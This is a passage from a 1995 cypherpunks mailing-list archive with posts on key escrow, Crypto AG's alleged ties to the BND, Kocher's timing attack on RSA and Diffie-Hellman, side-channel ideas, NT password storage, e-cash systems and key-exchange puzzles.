acknowledgement program, where either a (really hairy) virus, or, 
more practically, an active email interloper could fake FV acks?  

While hardware may be the best encryption solution for the average user
(as you say, and I think I agree with you), it needs to have some password
interface such as a small keypad on the front of the smartcard, to prevent
its usability after theft.

Of course, there are problems with digicash as well; my Digicash play-money
account thinks it's empty (in spite of having half a dozen coin-looking files),
and doesn't recognize any of the half-dozen passwords I've guessed I might have
used with it, so I'm not able to use Sameer's digicash-powered remailer.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Dec 95 17:30:13 PST
To: cypherpunks@toad.com
Subject: GAK Query
Message-ID: <199512110128.CAA13387@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Steven Miller, in his "Civilizing Cyberspace," remarks in
his coverage of encryption issues that:

   ... the Administration is trying to split the [GAK]
   opposition by working with private industry groups on
   compromise escrow strategies that would let government
   agents see the contents of decoded messages without
   getting access to the escrowed key itself. [p. 306]

Does anyone know more about this tactic, whether it is
being pursued, or the legal and technical procedures for
decoding and seeing the messages?


As previously noted here:

Civilizing Cyberspace:
Policy, Power and the Information Highway
Steven E. Miller (CPSR Board)
Addison Wesley, 1996
ISBN 0-201-84760-4












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf_Moeller@public.uni-hamburg.de (Ulf Moeller)
Date: Sun, 10 Dec 95 18:31:41 PST
To: cypherpunks@toad.com
Subject: Re: NSA rigs Crypto machines according to Balto Sun
Message-ID: <m0tOxme-00009qC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


pcw@access.digex.net (Peter Wayner) writes:

>So, is this what happened at Crypto AG? Is this what happened at
Netscape?

What happened to Crypto AG is that they are -- at least partly --
*owned* by the German secret service BND.

I'll try to give a rough translation of a section from a book by
Erich Schmidt-Eenboom:

"The BND would like to put a Clipper chip of their own, an exclusive
federal German back-door, into the encryption devices delivered
abroad. Rumors are persistent that this already happens -- illegally,
of course. For that purpuse, camouflage companies such as the Crypto AG
in the Swiss Steinhausen am Zuger are preferredly used. A former
Crypto financial manager confirmed to FOCUS magazine: The company's
owner is the Federal Republic of Germany. Crypto AG has been delivering
crypto devices to armies, polices and secret services in about 120
countries for over 40 years.

The enterprise got into the headlines when Crypto employee Hans
Buehler was arrested in March 1992 in Iran for threadbare espionage
accusations and was released only 9 1/2 months later on bail of
one million dollars. The true reasons for the arrest can only be
guessed. According to the records of the Bern police, Buehler was
classified as a security risk after his release by the west German
ministry of defense and then was fired by Crypto AG. The Zuerich
lawyer office assigned with indemnification claims, Gloor & Sieger,
draws the conclusion that "Iran has been suspecting for some longer
time that the crypto deviced delivered by Crypto AG had never or
no more conformed with Iranian security needs". Further they state:
"It is a fact (...) that for several years, articles kept appearing
in the international press reporting decryption of classified
messages encrypted with Crypto devices".

Some signs indicate that the suspection that Crypto devices have
been manipulated on purpuse is not at all out of place. During his
arrest in Iran, Buehler has been interrogated about reports in news
articles of the above kind for months. Crypto devices have been
tested and certified by the BND central office for encryption affairs
and later by the BSI. In addition to that: After the murder of exile
politician Bachtiar by an Iranian death commando in Paris, the BND
decrypted an encrypted radio message by the Iranian secret service
VEVAK at no effort."


German original:

From: frank@artcom.de (Frank Rieger)
Newsgroups: de.org.ccc
Subject: Crypto AG (Behrdenverschlsselung)
Date: Wed, 28 Jun 1995 15:13:31 +0200
Organization: ART + COM
Lines: 26
Distribution: world
Message-ID: <frank-2806951513310001@penny.artcom.de>


In der Liste der Firmen die Verschlsselungsgerte fr Behrden anbieten war auch die Crypto AG in der Schweiz. Zu dieser Firma fand ich gerade eine interessante Textstelle in (1):

"Den eigenen Clipper-Chip, das exklusive bundesdeutsche Hintertuerchen, wuerde der BND gerne in Verschluesselungsgeraete einbauen die ins Ausland geliefert werden. Hartnaekig haelt sich das Geruecht, dass dies manchmall bereits geschieht - illegalerweise, versteht sich. Dabei bedient man sieh hevorzugt Tarnfirmen wie etwa der Crypto AG im schweizerischen Steinhausen am Zuger . Eine Firma, von der ein Ex-Crypto-Finanzmanager gegenueber der Zeitschrift FOCUS bestaetigte: Besitzer der Firma ist die Bundesrepu
blik.   Die Crypto AG ruestet seit Ueber 40 Jahren Armeen, Polizei und Geheimdienste in rund 120 Laendern mit Verschluesselungsgeraeten aus.

   In die Schlagzeilen geriet das Unternehmen, als der Crypto-Mitarbeiter Hans Buehler unter fadenscheinigem Spionagevorwurf im Maerz 1992 im lran verhaftet wurde und erst neuneinhalb Monate spaeter gegen Zahlung einer Kaution von einer Million Dollar freikam. Ueber den wahren Grund der Verhaftung lassen sich nur Vermutungen anstellen. Laut Akten der Berner Polizei wurde Buehler nach seiner Haftentlassung vom westdeutschen Verteidigungsministerium 
als Sicherheitsrisiko eingestuft und daraufhin von der Crypto AG entlassen. Das mit Schadenersatzfarderungen betraute Zuericher Anwaltsbuero Gloor & Sieger kommt in einem Schriftsatz zu dem Schluss, "dass der Iran schon seit laengerer 
Zeit den Verdacht hegte, dass die von der Crypto AG gelieferten Chiffriergeraete den iranischen Sieherheitsbeduerfnissen nicht oder nicht mehr entspraechen". Weiter heisst es :"Tatsache ist (. . .), dass ueber mehrere Jahre hinweg immer 
wieder Artikel in der internationalen Presse erschienen sind, welche von der angehliehen Dekryptierung von 
klassitizierten Meldungen, welche mit Crypto-Geraeten chiffriert worden sind, berichten."

Einige Indizien deuten darauf hin dass der Verdacht, Crypto-Geraete seien mit Absicht manipuliert worden, keineswegs abwegig ist. Ueber Berichte in Zeitungsartikeln der erwaehnten Art wurde Buehler waehrend seiner Haft im Iran ueber Monate weg verhoert. Crypto-Geraete sind von der BND-Zentralstelle fuer Chiffrierwesen und spaeter vom BSl geprueft und abgenommen worden. Hinzu kommt noch folgendes: Nach der Ermordung des Exilpolitikers Bachtiar durch ein iranisches Todeskommando in Paris war es dem BND ein l
eichtes, einen verschluesselten Funkspruch des iranischen Geheimdienstes VEVAK zu dechiffrieren."

(1): Schmidt-Eenboom, Erich: Die schmutzigen Geschfte der Wirtschaftsspione; ECON Verlag 1994, S. 230f.
(OCR-&Konvertierungsfehler vorbehalten)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sun, 10 Dec 95 20:46:26 PST
To: cypherpunks@toad.com
Subject: Re: Paul Kocher's timing attack
In-Reply-To: <199512110312.WAA14627@nsa.tempo.att.com>
Message-ID: <30cbb71c.21744721@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze wrote:

> I think Kocher's paper is online somewhere; I'll post the URL
> when I find it.

ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps
ftp://ftp.cryptography.com/pub/kocher_timing_attack.ps.gz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 10 Dec 95 22:18:25 PST
To: Jerry Whiting <cypherpunks@toad.com>
Subject: Re: More elveator problem
Message-ID: <199512110720.BAA04212@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Dec 1995 00:23:41 -0800, Jerry Whiting wrote:

>More on The Elevator Problem:

>I'll confess that we're working on a new private key encryption product. Free 
>and clear of existing claims on intellectual property, I'd like a protocol 
>that answers the elevator problem: how can Alice and Bob agree on a private 
>key via a compromised channel? I don't want them to meet under a street lamp 
>and whisper in each other's ears _before_ trying to establish a secret on a 
>crowded elevator.

[..]
>Something that I neglected to mention before is that Alice and Bob do have a 
>unique ID within this system, not that they necessarily know each others. If 
>one assumes that they do, they then share a secret: the knowledge of each 
>other's unique ID.
[..]

Wait... are unique IDs secret from others? Can they share theirs with
ea. other without compromising something?

Maybe using a hash of their combined secret ideas (adding them, or
mixing the bits... how long is the unique ID?) can be used to generate
a "key" to exchange other information....


>Jerry Whiting
>jwhiting@azalea.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Den-Hollander <denholl@ceram.fr>
Date: Mon, 11 Dec 95 02:15:55 PST
To: cypherpunks@toad.com
Subject: OGY, chaotic scrambling
Message-ID: <199512111014.LAA13942@mbds.ceram.fr>
MIME-Version: 1.0
Content-Type: text/plain


A few years back i ran thru a paper emanating
from a navy labs researcher (i think the name was Peccora)
about using synchronised chaotic signal generators as a
signal scrambling/encrytpion scheme.

Has there been any kind of progress in this line of work,
practical applications ?

Answer on C4i-pro or directly email to Denholl@ceram.fr

L. Den-Hollander. OIT engineer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Mon, 11 Dec 95 20:15:55 PST
To: cypherpunks@toad.com
Subject: Anohter angle on timing (TEMPEST)
Message-ID: <9512120332.AA05424@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


	Reading of Mr Kochers clever attack brings to mind another way
of obtaining the timings it uses, particularly on smartcards and other 
tamper resistant hardware based crypto devices - but also perhaps on
locally accessible (and poorly sheilded) servers.

	Observing small changes in current drain, radiated rf pulses,
ground noise, noise on other pins of the device (eg a smartcard)  and
other kinds of transient electrical noise generated by an internal
processor performing a cyrpto algorithm noise might very well allow one
to quite precisely identify when certain sections  or loops in the
internal code of the device was running.   Using this information with
Kochar's statistical approach to determining bit values from time
variances might make such a tempest attack on protected keys held by
such a devices practical even for those of us not privy to the tricks
used by the spooks to process tempest data.  And it certainly could make
available much more timing information per run than just the gross time
to complete the crypto operation, in fact it is entirely possible that
an accurate timing for each step of the algorithm could be derived from
such noise measurements.
  
						Dave Emery
						die@die.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Tue, 12 Dec 95 04:05:53 PST
To: cypherpunks@toad.com
Subject: Roger's case against RSA?
Message-ID: <199512121203.EAA01268@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I know that a week or so ago, there was a hearing in San Jose regarding
Roger Schafly's (sp.) case against RSA.  How did the hearing come out?  I
never saw a post... :(
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Tue, 12 Dec 95 05:30:10 PST
To: turner@TeleCheck.com
Subject: Re: In pursuit of the perfect frisbie (was NSA flying disk...)
Message-ID: <199512121139.FAA22570@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> To:            cman@communities.com (Douglas Barnes)
> Cc:            cypherpunks@toad.com, turner@TeleCheck.com
> Subject:       In pursuit of the perfect frisbie (was NSA flying disk...)
> Date:          Mon, 11 Dec 95 14:33:26 -0600
> From:          turner@TeleCheck.com

> I spoke with Mr. Cisco for several minutes, but he stated that the
> NSA would not be at any trade shows in the Southern United States
> any time soon.  He did state that they would be in Salt Lake, sometime
> in the near future.

Did he mention a specific data and place?  I still have friends in 
SLC... :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Dec 95 01:45:37 PST
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112125.QAA07753@homeport.org>
Message-ID: <Pine.SUN.3.91.951212044438.11096A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 11 Dec 1995, Adam Shostack wrote:

> Jeff Weinstein wrote:
> 
> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
> | out his wallet and handed him 10 crisp $100 bills.  :-)
> 
> Great.  mention it where the IRS is sure to be listening.  :)
> 

Why would the IRS listen?  Everyone knows the tax system is voluntary.
 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Tue, 12 Dec 95 05:32:38 PST
To: cypherpunks@toad.com
Subject: Re: Third generation privacy
Message-ID: <199512121201.GAA24738@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Mon, 11 Dec 1995 15:50:23 -0500
> To:            cypherpunks@toad.com
> Subject:       Third generation privacy
> From:          tallpaul@pipeline.com (tallpaul)

> On Dec 11, 1995 13:07:22, '"Ed Carp (ecarp@netcom.com)" 
> <khijol!netcom.com!ecarp>' wrote:  
>   
> >Another, not-so-obvious reason to encrypt stuff, especially stuff   
> >that goes out over the net, is that folks can suck your email off the   
> >net and gather all sorts of useful information.  This has all kinds   
> >of annoying implications, especially for people who gather   
> >demographics and other data for constructing email lists for sale.  
> >  
> >-- short ed  
>   
> Another related issue is what I'll call "third generation" privacy. This 
> exists when I want privacy not for myself or even the person with whom I'm 
> communicating but to protect the privacy of innocent third parties. E.g.:  
>   
> Grandpa is getting senile and I'm communicating with a second family member
> 
> on how we should handle the problem;  
>   
> My friend Jane was just raped and I'm communicating with a mutual friend 
> about how we can help her.  
>   
> The anti-freedom forces have tried to define the parameters of the debate 
> inside the boundaries of the "four horsemen." We need to understand that we
> 
> do not have to remain within those false boundaries and, in fact, it is 
> very good not to.  

I run a sexual abuse survivor server, in which issues like these 
arise almost daily.  Anonymity and privacy are very important issues 
for these folks - for some of them, their survival depends on it 
(whether or not this is a provable issue is irrelevent).  I try, as 
best as I can, to provide an environment that encourages trust and 
openness by discouraging cheating - but the fact remains that 
people's trust in the server and the services it provides is a 
function of people's trust in *me*.  It would be, as Doyle might say, 
"simplicity itself" to violate people's privacy by reading their 
email, or watching their screen as they type, and I'd like to *not* 
have that ability, but the fact remains, I do.

I wish it weren't so - people should be able to have a place to go 
whereby their anonymity and privacy can be guaranteed, without having 
to trust the operator at all.  Zero-knowedge protocols can help, I suspect, but 
the fact remains that they have to trust *me* at some point in the 
process, much as people have to trust the folks running First Virtual 
and the other people doing the digicash thing.

I think that Pegasus with PGP will go a long way towards helping.  If 
someone is just using the server to store encrypted email and route 
end-to-end encrypted packets, then I'm "out of the loop" so to speak, 
and can concentrate on providing a common carrier service iostead of 
having the risk associated with being a publisher.  Most of these 
folks who use my server are pretty "computer illiterate" - the fact 
that some of them can even log in and send email is a miracle - no 
slight intended.  The point is, they need a *simple* solution to that 
privacy problem.

By the way, there's a well-known anonymous server whose operator does 
*not* have the same viewpoint, and considers himself a publisher, but 
doesn't recognize the inherent associated risks.  To him, people are 
using his system, and so he has the right to "see what goes through 
his system."  To me, this places both himself and the people who 
use his server at grave risk.  He is setting himself up for a massive 
court fight, and they are setting themselves up to having their 
privacy being violated.  I'd rather not take the risk, myself, but I 
suppose he has nothing better to spend his money on than lawyers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 12 Dec 95 05:06:37 PST
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl>
Message-ID: <199512121306.IAA02006@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
>  > Timings like the ones listed are trivial to take in
>  > establishing things like SSL sessions, or Photuris sessions.
>  > The danger is to online protocols, not to PGP.
> 
> This must be a new and interesting definition of the word
> "trivial" with which I was previously unfamiliar.
> 
> Quite frankly, I would be extremely surprised if anyone mounted a
> successful hostile attack against a server's RSA certificate
> using timings of remotely initiated SSL sessions outside of a
> controlled laboratory environment.

Go ahead and trust that no one can do it, then. Considering that NTP
can synch up clocks over the net with astonishing accuracy with
multiple probes, it would be hard to believe that you couldn't
similarly dramatically reduce the effects of network delays for the
purposes of mounting an attack on an RSA key, too.

However, if you don't believe it is possible, why, go ahead and ignore
it. Not my problem what you do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 95 05:38:28 PST
To: bryce@colorado.edu
Subject: Re: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512112006.NAA15060@taussky.cs.colorado.edu>
Message-ID: <IknMFgeMc50eQ2iy1f@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 11-Dec-95 Re: Usability of Cryptograp..
Bryce@taussky.cs.colorad (6455)

> I challenge you, however, to go beyond pointing this problem
> out and start suggesting some approaches to alleviating it.

Actually, this was something I was strongly considering doing as a major
new venture *until* Einar Stefferud introduced me to Lee Stein and we
realized that you could do payments without any cryptography at all. 
That, as you have seen, turned into a fairly major distraction.  I'd
still like to get back to usable crypto some day, however.

There are about a gazillion *easy* ways to make crypto software more
usable.  PGP is a *great* starting point in this regard, as almost any
user interface change is an improvement.  :-)

What's less obvious, and most critical, is how to map the complexities
of key management onto a usable interface.  What few ideas I have in
this regard are, well, ones I'd really like to productize some day,
which makes me a bit reluctant to suggest them publicly at this
point.....  I guess the one hint I'll drop is that the art of designing
good user interfaces usually comes down to choosing the right
abstractions or metaphors.
--------
Nathaniel Borenstein <nsb@fv.com> (FAQ & PGP key: nsb+faq@nsb.fv.com)
Chief Scientist, First Virtual Holdings

VIRTUAL YELLOW RIBBON==> http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 95 07:14:58 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
Message-ID: <199512121533.JAA21358@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 12/11/95 -0500, it was written:
>[...]
>> but since the contents of the key were never 
>> touched on DIRECTLY, no eavesdfropper could determine the key, 
>
>No, the integrity of the system really depends upon the quantum properties
>of light. Among other things, Heisenberg's Uncertainty Principle makes it
>impossible for Eve to "eavesdrop" on the photons without affecting them
>measurably.
>
Disregarding the "quantum properties of light" issue, if Eve can listen
in on every communication between Alice and Bob about their keys, then
doesn't she have enough information to reconstruct the key herself?

The way I understand the system, in order for Alice to have Bob's key (and
vice versa) they each have to transmit a considerable amount of data about
their keys.  Even if those data are in the form of "twenty questions," neither
knows anything about the other's key at the start.  Is there something
painfully obvious that I'm missing?

>In this situation Eve can read the email traffic without modifying it, so the
>game is up.
Exactly.

Dave

----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Tue, 12 Dec 95 07:15:02 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <199512121533.JAA21362@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 AM 12/12/95 -0500, Black Unicorn wrote:

>> | PS - I think Paul was a bit surprised when Jim Barksdale pulled
>> | out his wallet and handed him 10 crisp $100 bills.  :-)
>> Great.  mention it where the IRS is sure to be listening.  :)
>Why would the IRS listen?  Everyone knows the tax system is voluntary.

Do you know something I don't?  :)
Would you mind sharing?  :)

Dave
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Quote: "And if we change, well, I'll love you anyway" - Alice In Chains
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 12 Dec 95 07:29:41 PST
To: cypherpunks@toad.com
Subject: Today's Baltimore Sun on the NSA...
Message-ID: <v02130504acf35085d866@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



As I mentioned on Sunday, the Baltimore Sun is running a long
series on the NSA. Today, the published an article that
described how the NSA routinely listens into the phone calls of
Americans. This happens in two ways. First, if the conversation
leaves the country then the NSA can intercept it. Second, the
NSA is also allowed to grab local phone calls for "training"
purposes.

The funniest part of the article mentioned that Henry Kissenger
got both ends of the stick. He relied on NSA to pass him
sensitive information about his rivals. But the head of the
Department of Defense, who got to appoint the head of the NSA,
made sure that the NSA told him what Kissenger was up to.

The strangest anecdote involved a Baltimore Sun reporter who
called Cuban diplomats from overseas. This was picked up by NSA
and the evesdropper openly chatted about it a civilian cocktail
party. The details got back to the reporter. The parties in the
Baltimore suburbs are from the pages of Fleming not from the
pages of Cheever.

There is some debate about the whole issue of snooping on
American citizens. Everyone quoted on the record says it's all
pretty upstanding and good. The paper also gives a fair amount
of ink to the argument that American citizens could be involved
in terrorism too. This seems to be logical to me.

The deepest point made was that NSA could never really assume
greater law enforcement practices because this would involve
disseminating their information to a much larger audience. Since
using secret information often reveals that you can get it,
there is little doubt that people would stop using the phone
system and the other information sponges. So much for absolute
power.

-Peter Wayner

-=-=-=
 On Friday, the last article in the series is promised to
report, "The next war will be fought with computers. NSA is
getting ready." You will be able to buy a reprint of the NSA
stories from SunSource. $3.95. Call 410-332-6962.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 12 Dec 95 02:48:33 PST
To: cypherpunks@toad.com
Subject: Re: Win NT proprietary pw encryption (Was: Re: Windows .PWL          cracker...)
In-Reply-To: <2.2b7.32.19951211214329.002cc3a8@netcom4.netcom.com>
Message-ID: <30CD5E4C.56A@nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Ted Cabeen wrote:

> I took a quick look in my NT registry and you can get access to the Account
> Manager section of the registry by manually changing the permissions and
> giving yourself access.  I didn't have the time to look at all of the
> entries in the registry, but there's a lot of stuff there and I wouldn't be
> suprised if the encryted passwords were available.  Of course, you have to
> be an administrator to change the permissions, but it is possible.

The encrypted passwords are in the "SECURITY" section, which the OS will not
let you change the permissions to.  Most user account information is available
under NT via the NetUser... API functions, the passwords are not.  You probably
came across the settings for the Security Account Manager, not the data that it
looks after.


Regards,

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthias Schunter <schunter@informatik.uni-hildesheim.de>
Date: Tue, 12 Dec 95 02:49:42 PST
To: David Klur <dklur@dttus.com>
Subject: Re: e-Cash: CAFE vs. Mondex
Message-ID: <v02120d09acf307537019@[147.172.54.29]>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. Klur,


I'm member of the CAFE consortium but I can not answer your question.
As far as we know, the details of the Mondex protocols are still 
confidential (or only available under a non-disclosure license). 

However, I can give you some details about CAFE. 

The CAFE system is a cheque based system. This means that the customer receives an electronic chequebook, where each cheque is (blindly) signed by the bank.
During each payment the customer has to use one of these signed cheques.

Some of its properties are:
 secure
   Breaking the card results in a limited gain, since soon the customer will
   run out of cheques (Mondex' security is quite likely only based on 
   tamper-resistance).
 open
   Due to the open public-key architecture used, the system is open, e.g., it 
   supports multiple-issuer, multiple-currencies.
   One part of this openness is the public availability of the specifications.
 practical
   It provides full loss- and fault-tolerance (i.e. if you loose your wallet 
   you're able to recover your electronic money) and supports fast
   micropayments (e.g., for phone ticks).
 privacy-protecting
   The privacy of the user is protected.

We will soon publish our full protocol and architecture specifications.
A short 50-page summary is already available (PostScript). 
Additional information may be found at
 http://www.informatik.uni-hildesheim.de/~sirene/projects/cafe/index.html

Please ontact me, if you are interested in this abstract or if you have additional questions.


Regards,

 M. Schunter


--- Forwarded mail from "David Klur" <dklur@dttus.com>

Date: Mon, 11 Dec 95 12:13:48 CST
From: "David Klur" <dklur@dttus.com>
To: cypherpunks@toad.com, WWW-BUYINFO@allegra.att.com
     
     Is the Cafe e-cash system different than Mondex? If so, how?
     Also, does anyone know when the Mondex trial will start in Delaware?

---End of forwarded mail from "David Klur" <dklur@dttus.com>

% Matthias <Schunter@acm.org> Uni Hildesheim +49(5121)883-788 fax-732





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 11 Dec 95 20:26:50 PST
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512120058.BAA25991@utopia.hacktic.nl>
Message-ID: <Pine.SOL.3.91.951212135724.12253H-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Dec 1995, Anonymous wrote:
>  > Timings like the ones listed are trivial to take in
>  > establishing things like SSL sessions, or Photuris sessions.
>  > The danger is to online protocols, not to PGP.
> This must be a new and interesting definition of the word
> "trivial" with which I was previously unfamiliar.
> 
> Quite frankly, I would be extremely surprised if anyone mounted a
> successful hostile attack against a server's RSA certificate
> using timings of remotely initiated SSL sessions outside of a
> controlled laboratory environment.

Well lets put it this way, people have hacked machines through firewalls
via IP spoofing, broken a single SSL RC4-40 bit session after weeks of CPU
time, are you saying that perhaps being able to break a fixed
Diffie-Hellman key on a central router/computer would not be worth trying. 
Remember, if you broke this key, and had recorded the last 6 months worth
of traffic, you can now decode all of this traffic.  Once you have that
secret key and those packet logs, the decoding is a trivial and mechanical
process (trust me on this one).  One of the major advantages of choosing a
new secret key per HD negotiation is that you loose this capacity to
decrypt previous and future sessions. When we talk about taking 100s of
years to factor large primes, a system that may work after a month or 2 of
collecting data and statistics is definatly an easier proposition,
especially when the reward is all past and future traffic. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 95 14:34:43 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Time-based cryptanalysis: How to defeat it?
In-Reply-To: <199512110854.AAA14652@ix2.ix.netcom.com>
Message-ID: <199512122233.RAA21952@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
> The most interesting detail in the paper, to me, was:
> 
> PK> Computing optional Ri+1 calculations regardless of whether the exponent 
> PK> bit is set does not work and can actually make the attack easier;
> PK> the computations still diverge but attackers no longer have to identify
> PK> the lack of a correlation for adjacent zero exponent bits. 
> 
> My immediate reaction to the description of the timing attack on 
> Diffie-Hellman had, of course, been to do precisely that :-)

I don't understand why Kocher's point is correct. For example, why do the
times diverge with the following modification of the modexp algorithm on
pg.2 of the abstract ?

	Algorithm to compute R = y^x mod n:
		Let R_0 = 1.
		Let y_0 = y.
		For i = 0 upto (bits_in_x - 1):
			Let M = (R_i * y_i) mod n.
			Let R_(i+1) = (bit i of x) * M  +
					(1 - (bit i of x)) * R_i.
			Let y_(i+1) = (y_i)^2 mod n.
		End.

(I suppose I should wait for the full paper....)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 12 Dec 95 03:52:55 PST
To: turner@TeleCheck.com
Subject: Re: anti-copy
In-Reply-To: <9512112112.AA03120@mercury.telecheck.com>
Message-ID: <199512121152.WAA13728@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com (Cypherpunks Mailing List)
  and turner@TeleCheck.com
 
turner wrote: 
> futplex@pseudonym.com said:
> >> Daark writes: How would it be possible to create files that KNOW they 
> >> are  a copy?  
...
> would be to have itself figure out what track/sector it is on and inject
...
Defraggers, anyone?
...
> To summarize, its possible (under _some_ operating systems), but it is 
> not a good solution to the problem.

How about if you control the operating system and everything, is
it then possible to demonstrate that you don't have other copies?
(Ie escrow agent is able to prove to customer that info destroyed.)

Presumably this would be based on QM, EPR 'paradox' or something like that.
I've read about something called "Quantum Eraser", but I don't know
whether that could be used to store useful info (the vague description
was from an "isn't time weird" viewpoint and erased boring stuff).

Anybody better in QM?

However, I don't think that you'll be able to provide "only one copy",
because once that copy is received and read once the recipient can
recreate it.


Hope I'm making sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMM1tASxV6mvvBgf5AQETAgQAqd7VA7vTI2IyPNJ6MyJbV2Q6BKOQLww8
TB5g1ddVoYbktwQf0BW5YT5E9RKd1jfAvA43ZOd2Q2Po2vmDKid2J9xlwKoqhn1B
